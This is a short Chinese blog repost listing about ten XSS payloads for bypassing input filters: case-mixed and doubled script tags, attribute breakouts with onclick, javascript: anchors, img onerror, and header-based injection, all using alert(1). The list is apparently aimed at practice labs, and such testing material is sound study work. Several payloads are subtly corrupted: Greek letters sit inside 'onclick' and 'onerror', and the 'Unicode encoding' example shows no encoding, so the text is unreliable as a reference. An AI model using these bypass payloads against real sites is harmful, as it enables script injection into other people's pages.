当前位置:   article > 正文

xss|常见payload_xss典型payload

xss典型payload

1.普通的双写绕过

<ScRipt>alert(1)</ScRipt>
1"><ScRipt>alert(1)</ScRipt>


2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过


' onclick ='javascript:alert(1)'//
" onclick ='javascript:alert(1)'//

3.<> script onclick被过滤,用a标签绕过


"></input><a href='javascript:alert(1)'>asd</a>//

4.重写绕过


1"><ScscriptRipt>alert(1)</ScscriptRipt>

5.Unicode编码绕过


javascript:alert(1)

6.使用type=text来显示被隐藏的标签,再用事件


&t_sort=" type='text' οnclick='javascript:alert(1)'>//

7.referer UserAgent Cookie等地方也可以进行xss测试


referer:" type='text' οnclick='javascript:alert(1)'>//

8.图片

<img src=xxxx οnerrοr=alert(1)>'

9.用这些字符来测试哪些被过滤了


“ ‘ <> script onerror  onclick


10.空格用回车编码代替


<a%0D%0Aοnclick='alert(1)'>
 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/712713
推荐阅读